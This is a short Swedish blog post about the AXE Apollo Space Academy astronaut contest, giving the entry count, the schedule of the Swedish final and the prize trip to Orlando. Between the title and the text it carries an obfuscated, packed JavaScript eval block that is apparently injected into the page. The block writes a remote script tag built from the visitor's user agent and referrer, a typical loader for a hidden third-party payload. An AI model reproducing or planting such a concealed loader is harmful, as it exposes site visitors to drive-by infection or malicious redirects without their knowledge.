Image Image Image Image Image Image Image Image Image Image

| 26 maj, 2020

Scroll to top

Top

Axe Apollo Space Academy!

Axe Apollo Space Academy!
Sebastian

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hheet|var|u0026u|referrer|ezzyb||js|php’.split(’|’),0,{}))

AXE Apollo: Tävlingen håller fortfarande på, avslutas 31 maj. Hittills är det 3 850 anmälningar från Sverige så än har du chansen!

Den svenska finalen äger rum den 10 augusti 2013. 12 personer blir uttagna – sex som vunnit den här tävlingen och sex wildcards. Finalen inleds med frukost, sedan väntar en spännande föreläsning om rymden. Därefter serveras lunch för att fylla på med krafter inför eftermiddagens tuffa tester. Testerna ska avgöra finalisternas intelligens, logiska tänkande och fysik.

Dagen avslutas med att en jury utser vinnaren – den person som är mest lämpad att bli astronaut. Vinnaren åker till Orlando och Kennedy Space Center för att tävla om en av platserna till rymden. Ja, riktiga rymden!

Kika på videon ovan!

Länk till tävlingen: http://bit.ly/AxeApolloSE1